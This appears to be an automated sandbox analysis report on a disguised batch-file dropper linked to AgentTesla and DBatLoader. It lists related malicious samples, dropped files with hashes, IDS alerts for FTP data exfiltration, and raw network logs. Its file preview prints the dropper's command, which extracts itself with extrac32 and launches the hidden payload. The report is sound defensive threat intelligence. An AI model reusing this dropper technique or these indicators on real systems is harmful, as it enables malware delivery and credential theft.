| api.ipify.org | Bill_Of _Lading.exe | malicious | AgentTesla | 172.67.74.152 |
| api.ipify.org | Shipping documents 00029399400059.exe | malicious | AgentTesla | 172.67.74.152 |
| api.ipify.org | z20SWIFT_MT103_Payment_552016_pdf.exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205 |
| api.ipify.org | file.exe | malicious | CredGrabber, Meduza Stealer | 172.67.74.152 |
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        EXABYTES-AS-APExaBytesNetworkSdnBhdMYz20SWIFT_MT103_Payment_552016_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 110.4.45.197
                                                                        Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 110.4.45.197
                                                                        z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 110.4.45.197
                                                                        Order Specifications for Materials.docx.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 110.4.45.197
                                                                        na.elfGet hashmaliciousMiraiBrowse
                                                                        • 203.142.6.25
                                                                        05NN8zSK04.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 103.6.198.178
                                                                        file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                                        • 103.6.198.219
                                                                        DHL_Shipment_Details_8th_October.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 110.4.45.197
                                                                        file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                                        • 103.6.198.219
                                                                        z92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 110.4.45.197
                                                                        UNIFIEDLAYER-AS-1USz1SWIFT_MT103_Payment_552016_cmd.batGet hashmaliciousDBatLoader, FormBookBrowse
                                                                        • 50.116.93.185
                                                                        Order Specifications for Materials.docx.vbsGet hashmaliciousDBatLoader, FormBookBrowse
                                                                        • 50.116.93.185
                                                                        https://mailhotcmhakamloops.wordpress.com/Get hashmaliciousUnknownBrowse
                                                                        • 69.49.230.198
EVER ABILITY V66 PARTICULARS.pdf.exe | malicious | AgentTesla, PureLog Stealer | 50.87.144.157
MV. NORDRHONE VSL's PARTICULARS.xlsx.exe | malicious | AgentTesla, PureLog Stealer | 50.87.144.157
MUM - VESSEL'S PARTICULARS.pdf.exe | malicious | AgentTesla, PureLog Stealer | 50.87.144.157
Electronic_Receipt_ATT0001.htm | malicious | Unknown | 69.49.245.172
Oakville_Service_Update_d76b33a1-3420-40be-babd-e82e253ad25c.pdf | malicious | HTMLPhisher | 192.185.12.205
http://dcrealestateclasses.com/sirmy359ka/logfds65475mnvn/0Px7KgmP2ER6zsKKoRahD/ZGFuaWVscGxvdHRlbEBxdWFudGV4YS5jb20= | malicious | Unknown | 192.185.13.169
https://docs.google.com/drawings/d/1OzqwiA1nI8GUoiKob_qJY5xL1HmGK6VrRXlYUDuD68w/preview?pli=1JXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrl | malicious | Mamba2FA | 108.179.193.4

Match: CLOUDFLARENETUS
na.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
na.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
na.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
file.exe | malicious | LummaC | 188.114.96.3
na.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
Payment&WarantyBonds.exe | malicious | FormBook | 172.67.154.67
PO.2407010.xls | malicious | HTMLPhisher, Lokibot | 104.21.74.191
ADJUNTA.vbs | malicious | GuLoader, Snake Keylogger | 188.114.97.3
File07098.PDF.exe | malicious | Snake Keylogger | 188.114.96.3
Payment Slip_SJJ023639#U00faPDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: 3b5074b1b5d032e5620f69f9f700ff0e
greatthingswithmegood.hta | malicious | Cobalt Strike, HTMLPhisher | 172.67.74.152
file.exe | malicious | WhiteSnake Stealer | 172.67.74.152
Reff_Yazaki-europe_575810710108_ZnjKTIejsM.html | malicious | Unknown | 172.67.74.152
ADJUNTA.vbs | malicious | GuLoader, Snake Keylogger | 172.67.74.152
File07098.PDF.exe | malicious | Snake Keylogger | 172.67.74.152
Payment Slip_SJJ023639#U00faPDF.scr.exe | malicious | Snake Keylogger | 172.67.74.152
Quality stuff.pdf.exe | malicious | Snake Keylogger | 172.67.74.152
Request For Quotation-RFQ097524.vbs | malicious | GuLoader, Snake Keylogger | 172.67.74.152
Request For Quotation-RFQ097524_Pdf.vbs | malicious | GuLoader, Snake Keylogger | 172.67.74.152
Request For Quotation-RFQ097524.vbs | malicious | GuLoader, Snake Keylogger | 172.67.74.152

Match: a0e9f5d64349fb13191bc781f81f42e1
file.exe | malicious | LummaC | 50.116.93.185
Orden de Compra.xlam.xlsx | malicious | Unknown | 50.116.93.185
Orden de compra.xlam.xlsx | malicious | Unknown | 50.116.93.185
z1SWIFT_MT103_Payment_552016_cmd.bat | malicious | DBatLoader, FormBook | 50.116.93.185
Order pdf.exe | malicious | DBatLoader, FormBook | 50.116.93.185
Proforma Fatura ektedir.exe | malicious | DBatLoader, FormBook | 50.116.93.185
PO-004976.xls | malicious | Unknown | 50.116.93.185
Order Pdf.exe | malicious | DBatLoader | 50.116.93.185
Transferencia.xls | malicious | Unknown | 50.116.93.185
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 50.116.93.185
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: C:\Users\Public\Libraries\xrbjyllC.pif
z1SWIFT_MT103_Payment_552016_cmd.bat | malicious | DBatLoader, FormBook
Order Specifications for Materials.docx.vbs | malicious | DBatLoader, FormBook
Payment.cmd | malicious | Azorult, DBatLoader
ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmd | malicious | AgentTesla, DBatLoader
ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmd | malicious | AgentTesla, DBatLoader
Julcbozqsvtzlo.cmd | malicious | Remcos, AveMaria, DBatLoader, PrivateLoader, UACMe
Confirmation.docx.exe | malicious | DBatLoader, Lokibot
ZG7UaFRPVW.exe | malicious | DBatLoader, Remcos
IN-34823_PO39276-pdf.vbe | malicious | Remcos, DBatLoader
7XU2cRFInT.exe | malicious | Remcos, DBatLoader
Process: C:\Users\user\AppData\Local\Temp\x.exe
File Type: MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF">), ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 104
Entropy (8bit): 5.1375037811797055
Encrypted: false
SSDEEP: 3:HRAbABGQYmTWAX+rSF55i0XMwysbx50K9Dovn:HRYFVmTWDyzUExqK0v
MD5: E9DEFC5F517D7E26B9398584079F580C
SHA1: BE4C94E82E6215DEBB6BBE83193681518D197FEE
SHA-256: 857F6D8793545669B1DA61A916D1AA73DB9ABB66FA6769E0961DEC622791BA20
SHA-512: 5D9F0B2AB7C83A26C5AFC52A655F2F243C12E5983A27730192A15923DD7E6812FD28EFC121E58D18750BBC509193CEC3DBB8FE4E1FD3E150775B2C1B2DB7ED5D
Malicious: true
Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF"..IconIndex=963148..HotKey=28..

Process: C:\Windows\SysWOW64\esentutl.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1138688
Entropy (8bit): 6.826651927142877
Encrypted: false
SSDEEP: 24576:+VL/y4HWMvHg4VLerA+EYyx9XXIDT8Jf3pbV13Jks:Q6MPPRlPXI8t5X
MD5: 08C4AFC4A714EDFE9F2554B72DA40A04
SHA1: C5BF192E4258D42C359504997FDDAB6BF812E2F9
SHA-256: 64E1D81708B22A034F42FEE4DCDDB6B90A191A0F1B0A2754E8F82A1723675AB5
SHA-512: 90429C5FB34744C51942430A40AFCFF2DA83D569D6570C52801A07B97C02DA4B759973EA495AC8B78F38FD4B6120858B4FAF8D5ED7C964FB8731CCF52950D3DD
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 32%
Process: C:\Users\user\AppData\Local\Temp\x.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4
Entropy (8bit): 2.0
Encrypted: false
SSDEEP: 3:9v:N
MD5: FFED080BF0C3B454B4D2873AF298511E
SHA1: 33B86DCB41B307CE92537C42466B3AC65FA75340
SHA-256: 2B3275E2630092BE620791E92F0B2D759BA133346CE66FEE677F3EFF5A23D48E
SHA-512: A89E385BA8AC683AEE84712658C90F30EA6AE6E10021D971AA616A3D417F78AEB14FF627A316403F4922AA80F6729DB0AC522FEAC906413EAD9800372411E755
Malicious: false
Preview: 87..

Process: C:\Users\user\AppData\Local\Temp\x.exe
File Type: DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
Category: dropped
Size (bytes): 62357
Entropy (8bit): 4.705712327109906
Encrypted: false
SSDEEP: 768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
MD5: B87F096CBC25570329E2BB59FEE57580
SHA1: D281D1BF37B4FB46F90973AFC65EECE3908532B2
SHA-256: D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
SHA-512: 72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\x.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 68096
Entropy (8bit): 6.328046551801531
Encrypted: false
SSDEEP: 1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
MD5: C116D3604CEAFE7057D77FF27552C215
SHA1: 452B14432FB5758B46F2897AECCD89F7C82A727D
SHA-256: 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
SHA-512: 9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:
• Filename: z1SWIFT_MT103_Payment_552016_cmd.bat, Detection: malicious
• Filename: Order Specifications for Materials.docx.vbs, Detection: malicious
• Filename: Payment.cmd, Detection: malicious
• Filename: ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmd, Detection: malicious
• Filename: ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmd, Detection: malicious
• Filename: Julcbozqsvtzlo.cmd, Detection: malicious
• Filename: Confirmation.docx.exe, Detection: malicious
• Filename: ZG7UaFRPVW.exe, Detection: malicious
• Filename: IN-34823_PO39276-pdf.vbe, Detection: malicious
• Filename: 7XU2cRFInT.exe, Detection: malicious
Process: C:\Windows\SysWOW64\esentutl.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 236544
Entropy (8bit): 6.4416694948877025
Encrypted: false
SSDEEP: 6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B
SHA1: 4048488DE6BA4BFEF9EDF103755519F1F762668F
SHA-256: 4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
SHA-512: 80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process: C:\Windows\System32\extrac32.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1138688
Entropy (8bit): 6.826651927142877
Encrypted: false
SSDEEP: 24576:+VL/y4HWMvHg4VLerA+EYyx9XXIDT8Jf3pbV13Jks:Q6MPPRlPXI8t5X
MD5: 08C4AFC4A714EDFE9F2554B72DA40A04
SHA1: C5BF192E4258D42C359504997FDDAB6BF812E2F9
SHA-256: 64E1D81708B22A034F42FEE4DCDDB6B90A191A0F1B0A2754E8F82A1723675AB5
SHA-512: 90429C5FB34744C51942430A40AFCFF2DA83D569D6570C52801A07B97C02DA4B759973EA495AC8B78F38FD4B6120858B4FAF8D5ED7C964FB8731CCF52950D3DD
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 32%
Process: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 244
Entropy (8bit): 4.61658696146199
Encrypted: false
SSDEEP: 6:+MrRJNpw1UDajMyc0ohRJNpw1UDajMyc0ov:pRJjEUDtyc0ohRJjEUDtyc0ov
MD5: 43429641FC18329AA43C377CA931E2CC
SHA1: A8123D641DC6B48F1B7601449A62BEE33BFDFEDA
SHA-256: 1B885BD7265A6C07E59D16DE6CF05575F47BDF6592C145DD6D369CE5C2976C80
SHA-512: 712DE502033CACB9A40728DA554D36F72E3E152815903FDCE9C5A3F818E3362A91761DAFEA5D97F8130605E272580010632D45CFE466383E1945F76C56E8F0AC
Malicious: false
Preview: 24-10-30.0335: Mercury/32 Loader Started..24-10-30.0335: Loader encountered Windows error 2 creating Mercury/32 process...24-10-30.0335: Mercury/32 Loader Started..24-10-30.0335: Loader encountered Windows error 2 creating Mercury/32 process...

Process: C:\Users\Public\Libraries\xrbjyllC.pif
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: modified
Size (bytes): 68096
Entropy (8bit): 6.328046551801531
Encrypted: false
SSDEEP: 1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
MD5: C116D3604CEAFE7057D77FF27552C215
SHA1: 452B14432FB5758B46F2897AECCD89F7C82A727D
SHA-256: 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
SHA-512: 9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@
Process: C:\Windows\SysWOW64\esentutl.exe
File Type: ASCII text, with CRLF, CR line terminators
Category: dropped
Size (bytes): 592
Entropy (8bit): 4.621396330050296
Encrypted: false
SSDEEP: 12:qbf/xTzaeSbZ7u0wxDDDDDDDDjCaY5aAaYAUATB8NGNe:Kf/xTzap7u0wQakaAaCAt8NR
MD5: 343E954129C332E60D8F9B55145CA365
SHA1: F8C444B41CE20EA1C82A14248F3A06C4425BDD50
SHA-256: 89A065092A8F23911A56253F3A01ABF3E3109C5523E8ACDD20070FE3C221A243
SHA-512: 2DCCDF988DACC262D2F4A9178E169125DB119A2E24E2A0B15980F4DE3B42417A7B4FD5013CFF9E560AA5D0960FA1D5C705233C45F9E7FA7D25E01195D2706BD4
Malicious: false
                                                                                            Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\AppData\Local\Temp\x.exe...Destination File: C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x116000 (1138688) (1 MB)....Total bytes written = 0x116000 (1138688) (1 MB).......Operation completed successfully in 0.109 seconds.....
Process: C:\Windows\SysWOW64\esentutl.exe
File Type: ASCII text, with CRLF, CR line terminators
Category: dropped
Size (bytes): 564
Entropy (8bit): 4.558269873549125
Encrypted: false
SSDEEP: 12:q6pLExT6ceSbZ7u0wxDDDDDDDDjCaY5n4aYAWS4TB8NGNv:/pLExT6cp7u0wQakn4al4t8NC
MD5: A6FADC7AC568000B6EBB2798B26B2747
SHA1: 8AE2FC2A2AF6E8D45E04D55E7A0EF80CD1452C05
SHA-256: CE127301AD198410E2CEA6A5F94C859AAFDE68A823437C5E6F6741FA08AF2447
SHA-512: DE460139ED47702EADEA6E45C9066FC0FE3DD20ADD94BF9A86F1EC2FDF2569D56BF62153155E28BFE983603B988FB596FCC0B3A7ED6ABC13E98748E02CEDBD18
Malicious: false
                                                                                            Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\cmd.exe...Destination File: C:\\Users\\Public\\alpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x39c00 (236544) (0 MB)....Total bytes written = 0x3a000 (237568) (0 MB).......Operation completed successfully in 0.63 seconds.....
File type: Microsoft Cabinet archive data, Windows 2000/XP setup, 4294967295 bytes, 1 file, at 0x75 +A "x.exe", number 1, 35 datablocks, 0 compression
Entropy (8bit): 6.826154747459283
TrID:
• Microsoft Cabinet Archive (8008/1) 99.91%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
File name: z1Transaction_ID_REF2418_cmd.bat
File size: 1'139'107 bytes
MD5: 597443c0b1405f3deaa48eef7de516c4
SHA1: 8f3688a384a9a8c8f70fc6a19382d73fbded0674
SHA256: 553f1b4f0532c10e855e349a79d51c1fbffe6f9e03360e50b1445b82d1667ebb
SHA512: 144d0c1f836950900520ae4f57156a924d657dc7107a79de982e02b732c91d8fdf307dcc675c6440683e307e397d63abb134c5dc0440765db0dfe99e1e91911f
SSDEEP: 24576:MhL/ykHKM7D84Vz6rcC4Qy19XbMDX8VP3lvV13FQs:maMvj5N7bMY51b
TLSH: 6D35AE2A75C09631E172027A6B079BD8861D3D313E24606FBDF55F3CEA316583E25EA3
                                                                                            File Content Preview:MSCF............u.......................#.......cls && extrac32 /y "%~f0" "%tmp%\x.exe" && start "" "%tmp%\x.exe".....`............ .x.exe.........MZP.....................@...............................................!..L.!..This program must be run und
Icon Hash: 9686878b929a9886
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-30T08:35:22.962696+0100 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.4 | 49744 | 110.4.45.197 | 21 | TCP
2024-10-30T08:35:23.900856+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49747 | 110.4.45.197 | 54601 | TCP
2024-10-30T08:35:23.907031+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49747 | 110.4.45.197 | 54601 | TCP
2024-10-30T08:35:39.357736+0100 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.4 | 49753 | 110.4.45.197 | 21 | TCP
2024-10-30T08:35:40.260221+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49754 | 110.4.45.197 | 63940 | TCP
2024-10-30T08:35:40.266852+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49754 | 110.4.45.197 | 63940 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 08:34:58.002439022 CET | 49730 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:58.002479076 CET | 443 | 49730 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:58.002557993 CET | 49730 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:58.002770901 CET | 49730 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:58.002818108 CET | 443 | 49730 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:58.002873898 CET | 49730 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:58.050447941 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:58.050496101 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:58.050565958 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:58.055082083 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:58.055098057 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:58.739486933 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:58.739557981 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:58.804135084 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:58.804176092 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:58.804954052 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:58.856123924 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.235292912 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.279337883 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.398030043 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.398055077 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.398061991 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.398158073 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.398171902 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.448137045 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.516011000 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.516033888 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.516078949 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.516128063 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.516161919 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.516810894 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.516819954 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.516877890 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.516895056 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.518388033 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.518398046 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.518469095 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.548598051 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.548612118 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.548731089 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.634876966 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.634973049 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.635755062 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.635822058 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.636603117 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.636674881 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.637105942 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.637171030 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.638011932 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.638097048 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.639663935 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.639738083 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.667295933 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.667377949 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.753343105 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.753424883 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.753814936 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.753887892 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.754165888 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.754225969 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.755024910 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.755110025 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.755127907 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.755197048 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.756084919 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.756160021 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.756172895 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.756181002 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.756217957 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.756225109 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.756930113 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.757000923 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.757842064 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.757901907 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.757919073 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.757965088 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.757982016 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.758747101 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.758810997 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.758822918 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.758893013 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.759704113 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.759830952 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.786201954 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.786273956 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.872139931 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.872194052 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.872282982 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.872298956 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.872311115 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.872343063 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.872490883 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.872560024 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.872571945 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
